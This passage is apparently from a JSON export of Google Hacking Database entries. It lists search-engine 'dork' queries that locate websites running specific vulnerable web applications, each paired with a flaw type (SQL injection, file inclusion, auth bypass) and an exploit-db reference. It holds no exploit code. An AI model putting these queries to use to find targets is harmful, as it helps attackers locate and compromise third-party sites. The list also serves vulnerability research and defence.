"http://www.google.com/search?q=allinurl:+%22modules/dictionary%22", "shortDescription": "allinurl: \"modules/dictionary\"", "textualDescription": "XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5267" }, { "signatureReferenceNumber": "1477", "link": "https://www.exploit-db.com/ghdb/1477/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22RS+MAXSOFT%22", "shortDescription": "\"RS MAXSOFT\"", "textualDescription": "RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: http://www.exploit-db.com/exploits/5426" }, { "signatureReferenceNumber": "1478", "link": "https://www.exploit-db.com/ghdb/1478/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%222007+RADIOZAZA+www.radiozaza.de%3F+istek+hatti+Version+2.5%22", "shortDescription": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "textualDescription": "Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: http://www.exploit-db.com/exploits/10231" }, { "signatureReferenceNumber": "1479", "link": "https://www.exploit-db.com/ghdb/1479/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22index.php%3Fp%3Dpoll%22showresult", "shortDescription": "allinurl: \"index.php?p=poll\"showresult", "textualDescription": "Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: http://www.exploit-db.com/exploits/5448" }, { "signatureReferenceNumber": "1480", "link": "https://www.exploit-db.com/ghdb/1480/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22com_joovideo%22+detail", "shortDescription": "allinurl: \"com_joovideo\" detail", "textualDescription": "Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: http://www.exploit-db.com/exploits/5277" }, { "signatureReferenceNumber": "1483", "link": "https://www.exploit-db.com/ghdb/1483/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=content_by_cat.asp%3Fcontentid+''catid''", "shortDescription": "content_by_cat.asp?contentid ''catid''", "textualDescription": "ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5286" }, { "signatureReferenceNumber": "1484", "link": "https://www.exploit-db.com/ghdb/1484/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By+AlstraSoft+Video+Share+Enterprise", "shortDescription": "Powered By AlstraSoft Video Share Enterprise", "textualDescription": "AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: http://www.exploit-db.com/exploits/6092" }, { "signatureReferenceNumber": "1485", "link": "https://www.exploit-db.com/ghdb/1485/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PG+Real+Estate+Solution+-+real+estate+web+site+design%22", "shortDescription": "\"Powered by PG Real Estate Solution - real estate web site design\"", "textualDescription": "PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: http://www.exploit-db.com/exploits/7200" }, { "signatureReferenceNumber": "1486", "link": "https://www.exploit-db.com/ghdb/1486/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PG+Roomate+Finder+Solution+-+roommate+estate+web+site+design%22", "shortDescription": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "textualDescription": "PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: http://www.exploit-db.com/exploits/7201" }, { "signatureReferenceNumber": "1487", "link": "https://www.exploit-db.com/ghdb/1487/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_pcchess+%22user_id%22", "shortDescription": "allinurl: com_pcchess \"user_id\"", "textualDescription": "Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: http://www.exploit-db.com/exploits/5104" }, { "signatureReferenceNumber": "1488", "link": "https://www.exploit-db.com/ghdb/1488/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+PHP+upload+-+unijimpe.", "shortDescription": "Powered by PHP upload - unijimpe.", "textualDescription": "PHP upload - (unijimpe) Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10732" }, { "signatureReferenceNumber": "1491", "link": "https://www.exploit-db.com/ghdb/1491/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+FubarForum+v1.6%22", "shortDescription": "\"Powered by FubarForum v1.6\"", "textualDescription": "FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: http://www.exploit-db.com/exploits/7595" }, { "signatureReferenceNumber": "1492", "link": "https://www.exploit-db.com/ghdb/1492/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:cfaq/index.php%3Fcatid%3D", "shortDescription": "inurl:cfaq/index.php?catid=", "textualDescription": "FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: http://www.exploit-db.com/exploits/6629" }, { "signatureReferenceNumber": "1493", "link": "https://www.exploit-db.com/ghdb/1493/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=''name+Kose_Yazilari+op+viewarticle+artid''", "shortDescription": "''name Kose_Yazilari op viewarticle artid''", "textualDescription": "PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: http://www.exploit-db.com/exploits/5186" }, { "signatureReferenceNumber": "1494", "link": "https://www.exploit-db.com/ghdb/1494/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:+modifyform.html%3Fcode%3D", "shortDescription": "inurl: modifyform.html?code=", "textualDescription": "modifyform (modifyform.html) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4423" }, { "signatureReferenceNumber": "1496", "link": "https://www.exploit-db.com/ghdb/1496/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_ricette", "shortDescription": "allinurl: com_ricette", "textualDescription": "Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: http://www.exploit-db.com/exploits/5133" }, { "signatureReferenceNumber": "1497", "link": "https://www.exploit-db.com/ghdb/1497/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=out.php%3Flinkid%3D1", "shortDescription": "out.php?linkid=1", "textualDescription": "Link ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5930" }, { "signatureReferenceNumber": "1499", "link": "https://www.exploit-db.com/ghdb/1499/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22+ActiveKB+v1.5+Copyright+%C3%82%C2%A9%22", "shortDescription": "\" ActiveKB v1.5 Copyright \u00c2\u00a9\"", "textualDescription": "ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: http://www.exploit-db.com/exploits/5616" }, { "signatureReferenceNumber": "1500", "link": "https://www.exploit-db.com/ghdb/1500/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22com_garyscookbook%22", "shortDescription": "allinurl:\"com_garyscookbook\"", "textualDescription": "Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: http://www.exploit-db.com/exploits/5178" }, { "signatureReferenceNumber": "1501", "link": "https://www.exploit-db.com/ghdb/1501/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Fconteudo%3D%22", "shortDescription": "inurl:\"index.php?conteudo=\"", "textualDescription": "Waibrasil Remote / Local File Inclusion: http://www.exploit-db.com/exploits/12562" }, { "signatureReferenceNumber": "1504", "link": "https://www.exploit-db.com/ghdb/1504/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22section.php%3Fname%3Dsingers%22", "shortDescription": "inurl:\"section.php?name=singers\"", "textualDescription": "6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: http://www.exploit-db.com/exploits/6511" }, { "signatureReferenceNumber": "1505", "link": "https://www.exploit-db.com/ghdb/1505/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:cat1.php%3FcatID%3D+%22Spaceacre%22", "shortDescription": "inurl:cat1.php?catID= \"Spaceacre\"", "textualDescription": "Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12756" }, { "signatureReferenceNumber": "1506", "link": "https://www.exploit-db.com/ghdb/1506/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+FubarForum+v1.6%22", "shortDescription": "\"Powered by FubarForum v1.6\"", "textualDescription": "FubarForum 1.6 Admin Bypass Change User Password Vulnerability: http://www.exploit-db.com/exploits/7606" }, { "signatureReferenceNumber": "1507", "link": "https://www.exploit-db.com/ghdb/1507/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%C3%82%C2%A92003-2008+RC+v3.1+Developed+by:+GA+Soft", "shortDescription": "intext:\u00c2\u00a92003-2008 RC v3.1 Developed by: GA Soft", "textualDescription": "Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: http://www.exploit-db.com/exploits/7324" }, { "signatureReferenceNumber": "1508", "link": "https://www.exploit-db.com/ghdb/1508/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:comment.asp+intext:Your+e-mail+address+will+be+used+to+send+you+voting+and+comment+activity.+Inclusion+of+your+address+is+optional+but+Battle+Blog+cannot+notify+you+of+these+activities+unless+you+supply+an+accurate+e-m", "shortDescription": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "textualDescription": "Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: http://www.exploit-db.com/exploits/9183" }, { "signatureReferenceNumber": "1509", "link": "https://www.exploit-db.com/ghdb/1509/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_img", "shortDescription": "inurl:com_img", "textualDescription": "Joomla Component (com_img) LFI Vulnerability: http://www.exploit-db.com/exploits/15470" }, { "signatureReferenceNumber": "1511", "link": "https://www.exploit-db.com/ghdb/1511/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=details.php%3Fp_id%3D", "shortDescription": "details.php?p_id=", "textualDescription": "The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: http://www.exploit-db.com/exploits/12620" }, { "signatureReferenceNumber": "1512", "link": "https://www.exploit-db.com/ghdb/1512/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22modules/photo/viewcat.php%3Fid%22", "shortDescription": "allinurl:\"modules/photo/viewcat.php?id\"", "textualDescription": "RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: http://www.exploit-db.com/exploits/5290" }, { "signatureReferenceNumber": "1514", "link": "https://www.exploit-db.com/ghdb/1514/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+35mm+Slide+Gallery", "shortDescription": "powered by 35mm Slide Gallery", "textualDescription": "35mm Slide Gallery Directory Traversal Vulnerability: http://www.exploit-db.com/exploits/10614" }, { "signatureReferenceNumber": "1515", "link": "https://www.exploit-db.com/ghdb/1515/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22com_simpleshop%22", "shortDescription": "allinurl:\"com_simpleshop\"", "textualDescription": "Joomla Component simple shop 2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5177" }, { "signatureReferenceNumber": "1516", "link": "https://www.exploit-db.com/ghdb/1516/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+vBulletin+3.8.4", "shortDescription": "powered by vBulletin 3.8.4", "textualDescription": "vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability: http://www.exploit-db.com/exploits/14833" }, { "signatureReferenceNumber": "1518", "link": "https://www.exploit-db.com/ghdb/1518/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:Web+Calendar+system+v+3.30+inurl:.asp", "shortDescription": "intitle:Web Calendar system v 3.30 inurl:.asp", "textualDescription": "Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: http://www.exploit-db.com/exploits/7242" }, { "signatureReferenceNumber": "1519", "link": "https://www.exploit-db.com/ghdb/1519/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Fpage%3Den_jobseekers", "shortDescription": "inurl:index.php?page=en_jobseekers", "textualDescription": "JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: http://www.exploit-db.com/exploits/4576" }, { "signatureReferenceNumber": "1521", "link": "https://www.exploit-db.com/ghdb/1521/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=webwizguestbook_license.asp", "shortDescription": "webwizguestbook_license.asp", "textualDescription": "Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: http://www.exploit-db.com/exploits/7488" }, { "signatureReferenceNumber": "1522", "link": "https://www.exploit-db.com/ghdb/1522/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+aid+%22com_xfaq%22", "shortDescription": "allinurl: aid \"com_xfaq\"", "textualDescription": "Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: http://www.exploit-db.com/exploits/5109" }, { "signatureReferenceNumber": "1523", "link": "https://www.exploit-db.com/ghdb/1523/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:modules/flashgames/", "shortDescription": "inurl:modules/flashgames/", "textualDescription": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: http://www.exploit-db.com/exploits/3849" }, { "signatureReferenceNumber": "1524", "link": "https://www.exploit-db.com/ghdb/1524/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_mediaslide", "shortDescription": "inurl:index.php?option=com_mediaslide", "textualDescription": "Joomla Component com_mediaslide Directory Traversal Vulnerability: http://www.exploit-db.com/exploits/10591" }, { "signatureReferenceNumber": "1525", "link": "https://www.exploit-db.com/ghdb/1525/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_biblestudy%22", "shortDescription": "inurl:\"com_biblestudy\"", "textualDescription": "Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: http://www.exploit-db.com/exploits/10943" }, { "signatureReferenceNumber": "1526", "link": "https://www.exploit-db.com/ghdb/1526/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_dashboard%22", "shortDescription": "inurl:\"com_dashboard\"", "textualDescription": "Joomla Component com_dashboard Directory Traversal: http://www.exploit-db.com/exploits/11086" }, { "signatureReferenceNumber": "1527", "link": "https://www.exploit-db.com/ghdb/1527/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_jcollection+%22", "shortDescription": "inurl:\"com_jcollection \"", "textualDescription": "Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: http://www.exploit-db.com/exploits/11088" }, { "signatureReferenceNumber": "1529", "link": "https://www.exploit-db.com/ghdb/1529/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Affiliate+Network+Pro%22", "shortDescription": "\"Affiliate Network Pro\"", "textualDescription": "AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: http://www.exploit-db.com/exploits/6087" }, { "signatureReferenceNumber": "1531", "link": "https://www.exploit-db.com/ghdb/1531/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=index.php%3Foption%3Dcom_pcchess", "shortDescription": "index.php?option=com_pcchess", "textualDescription": "PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: http://www.exploit-db.com/exploits/2069" }, { "signatureReferenceNumber": "1532", "link": "https://www.exploit-db.com/ghdb/1532/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By:+Forest+Blog+v1.3.2", "shortDescription": "Powered By: Forest Blog v1.3.2", "textualDescription": "Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: http://www.exploit-db.com/exploits/7466" }, { "signatureReferenceNumber": "1533", "link": "https://www.exploit-db.com/ghdb/1533/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+phpFastNews%22", "shortDescription": "intext:\"Powered by phpFastNews\"", "textualDescription": "phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: http://www.exploit-db.com/exploits/6779" }, { "signatureReferenceNumber": "1534", "link": "https://www.exploit-db.com/ghdb/1534/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+phpDatingClub", "shortDescription": "Powered by phpDatingClub", "textualDescription": "phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: http://www.exploit-db.com/exploits/6037" }, { "signatureReferenceNumber": "1535", "link": "https://www.exploit-db.com/ghdb/1535/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+Censura%22", "shortDescription": "\"Powered by: Censura\"", "textualDescription": "Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: http://www.exploit-db.com/exploits/3843" }, { "signatureReferenceNumber": "1536", "link": "https://www.exploit-db.com/ghdb/1536/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_clanlist", "shortDescription": "inurl:com_clanlist", "textualDescription": "Joomla Component (com_clanlist) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15456" }, { "signatureReferenceNumber": "1537", "link": "https://www.exploit-db.com/ghdb/1537/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22This+script+created+by+www.script.canavari.com%22", "shortDescription": "\"This script created by www.script.canavari.com\"", "textualDescription": "Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: http://www.exploit-db.com/exploits/2848" }, { "signatureReferenceNumber": "1538", "link": "https://www.exploit-db.com/ghdb/1538/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:classified/product_desc.php%3Fid%3D", "shortDescription": "inurl:classified/product_desc.php?id=", "textualDescription": "GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: http://www.exploit-db.com/exploits/6189" }, { "signatureReferenceNumber": "1539", "link": "https://www.exploit-db.com/ghdb/1539/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22members.asp%3Faction%22", "shortDescription": "allinurl:\"members.asp?action\"", "textualDescription": "MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5187" }, { "signatureReferenceNumber": "1540", "link": "https://www.exploit-db.com/ghdb/1540/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:btg_oglas", "shortDescription": "inurl:btg_oglas", "textualDescription": "Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability: http://www.exploit-db.com/exploits/15468" }, { "signatureReferenceNumber": "1541", "link": "https://www.exploit-db.com/ghdb/1541/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+lineaCMS+%C2%A9+2006+lineaPHP+Group", "shortDescription": "Powered by lineaCMS \u00a9 2006 lineaPHP Group", "textualDescription": "lineaCMS Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10736" }, { "signatureReferenceNumber": "1542", "link": "https://www.exploit-db.com/ghdb/1542/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Scripteen+Free+Image+Hosting+Script+V+2.3%22", "shortDescription": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "textualDescription": "Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: http://www.exploit-db.com/exploits/9256" }, { "signatureReferenceNumber": "1543", "link": "https://www.exploit-db.com/ghdb/1543/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_jvideodirect+%22", "shortDescription": "inurl:\"com_jvideodirect \"", "textualDescription": "Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: http://www.exploit-db.com/exploits/11089" }, { "signatureReferenceNumber": "1544", "link": "https://www.exploit-db.com/ghdb/1544/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Siteman+Version+1.1.9%22", "shortDescription": "\"Siteman Version 1.1.9\"", "textualDescription": "Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: http://www.exploit-db.com/exploits/4973" }, { "signatureReferenceNumber": "1545", "link": "https://www.exploit-db.com/ghdb/1545/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22SimpleBlog+2.3+by+8pixel.net%22", "shortDescription": "\"SimpleBlog 2.3 by 8pixel.net\"", "textualDescription": "SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: http://www.exploit-db.com/exploits/2853" }, { "signatureReferenceNumber": "1546", "link": "https://www.exploit-db.com/ghdb/1546/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/squirrelcart/", "shortDescription": "inurl:/squirrelcart/", "textualDescription": "Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: http://www.exploit-db.com/exploits/1790" }, { "signatureReferenceNumber": "1547", "link": "https://www.exploit-db.com/ghdb/1547/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_markt", "shortDescription": "inurl:com_markt", "textualDescription": "Joomla Component (com_markt) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15469" }, { "signatureReferenceNumber": "1548", "link": "https://www.exploit-db.com/ghdb/1548/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+EQdkp%22", "shortDescription": "\"powered by EQdkp\"", "textualDescription": "EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: http://www.exploit-db.com/exploits/1764" }, { "signatureReferenceNumber": "1549", "link": "https://www.exploit-db.com/ghdb/1549/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22Login+to+Calendar%22", "shortDescription": "intitle:\"Login to Calendar\"", "textualDescription": "ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: http://www.exploit-db.com/exploits/1763" }, { "signatureReferenceNumber": "1550", "link": "https://www.exploit-db.com/ghdb/1550/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22WebCalendar+v1.0.4%22", "shortDescription": "\"WebCalendar v1.0.4\"", "textualDescription": "WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: http://www.exploit-db.com/exploits/5847" }, { "signatureReferenceNumber": "1551", "link": "https://www.exploit-db.com/ghdb/1551/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_bfsurvey%22", "shortDescription": "inurl:\"com_bfsurvey\"", "textualDescription": "Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: http://www.exploit-db.com/exploits/10946" }, { "signatureReferenceNumber": "1552", "link": "https://www.exploit-db.com/ghdb/1552/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=anyInventory,+the+most+flexible+and+powerful+web-based+inventory+system", "shortDescription": "anyInventory, the most flexible and powerful web-based inventory system", "textualDescription": "AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: http://www.exploit-db.com/exploits/4365" }, { "signatureReferenceNumber": "1553", "link": "https://www.exploit-db.com/ghdb/1553/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:bemarket", "shortDescription": "inurl:bemarket", "textualDescription": "BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: http://www.exploit-db.com/exploits/4195" }, { "signatureReferenceNumber": "1554", "link": "https://www.exploit-db.com/ghdb/1554/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_jashowcase+%22", "shortDescription": "inurl:\"com_jashowcase \"", "textualDescription": "Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: http://www.exploit-db.com/exploits/11090" }, { "signatureReferenceNumber": "1555", "link": "https://www.exploit-db.com/ghdb/1555/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+React+-+www.react.nl", "shortDescription": "Powered by React - www.react.nl", "textualDescription": "React software [local file inclusion]: http://www.exploit-db.com/exploits/11943" }, { "signatureReferenceNumber": "1556", "link": "https://www.exploit-db.com/ghdb/1556/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22qjForum%22", "shortDescription": "\"qjForum\"", "textualDescription": "qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: http://www.exploit-db.com/exploits/1833" }, { "signatureReferenceNumber": "1557", "link": "https://www.exploit-db.com/ghdb/1557/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+cifshanghai.com%22", "shortDescription": "\"Powered by cifshanghai.com\"", "textualDescription": "Cifshanghai (chanpin_info.php) CMS SQL Injection: http://www.exploit-db.com/exploits/10105" }, { "signatureReferenceNumber": "1559", "link": "https://www.exploit-db.com/ghdb/1559/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22detResolucion.php%3Ftipodoc_id%3D%22", "shortDescription": "allinurl:\"detResolucion.php?tipodoc_id=\"", "textualDescription": "CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: http://www.exploit-db.com/exploits/12301" }, { "signatureReferenceNumber": "1560", "link": "https://www.exploit-db.com/ghdb/1560/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+:+Yamamah+Version+1.00%22", "shortDescription": "\"Powered By : Yamamah Version 1.00\"", "textualDescription": "Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13857" }, { "signatureReferenceNumber": "1561", "link": "https://www.exploit-db.com/ghdb/1561/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+osCSS", "shortDescription": "Powered by osCSS", "textualDescription": "osCSS v1.2.1 Database Backups Disclosure: http://www.exploit-db.com/exploits/11612" }, { "signatureReferenceNumber": "1562", "link": "https://www.exploit-db.com/ghdb/1562/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_prime%22", "shortDescription": "inurl:\"index.php?option=com_prime\"", "textualDescription": "Joomla Component com_prime Directory Traversal: http://www.exploit-db.com/exploits/11177" }, { "signatureReferenceNumber": "1563", "link": "https://www.exploit-db.com/ghdb/1563/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%222006+by+www.mani-stats-reader.de.vu%22", "shortDescription": "\"2006 by www.mani-stats-reader.de.vu\"", "textualDescription": "Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: http://www.exploit-db.com/exploits/3398" }, { "signatureReferenceNumber": "1565", "link": "https://www.exploit-db.com/ghdb/1565/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by:+WebLeague%22", "shortDescription": "\"powered by: WebLeague\"", "textualDescription": "webLeague 2.2.0 (install.php) Remote Change Password: http://www.exploit-db.com/exploits/9164" }, { "signatureReferenceNumber": "1567", "link": "https://www.exploit-db.com/ghdb/1567/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22All+Rights+Reserved.+Powered+by+DieselScripts.com%22", "shortDescription": "\"All Rights Reserved. Powered by DieselScripts.com\"", "textualDescription": "Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: http://www.exploit-db.com/exploits/6488" }, { "signatureReferenceNumber": "1569", "link": "https://www.exploit-db.com/ghdb/1569/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:Web+Calendar+system+v+3.40++inurl:.asp", "shortDescription": "intitle:Web Calendar system v 3.40 inurl:.asp", "textualDescription": "Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7265" }, { "signatureReferenceNumber": "1570", "link": "https://www.exploit-db.com/ghdb/1570/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_noticia", "shortDescription": "inurl:index.php?option=com_noticia", "textualDescription": "Joomla compnent com_noticia cross site scripting: http://www.exploit-db.com/exploits/10789" }, { "signatureReferenceNumber": "1571", "link": "https://www.exploit-db.com/ghdb/1571/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:guestbook.php+%22Advanced+GuestBook%22+%22powered+by+phpbb%22", "shortDescription": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "textualDescription": "Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: 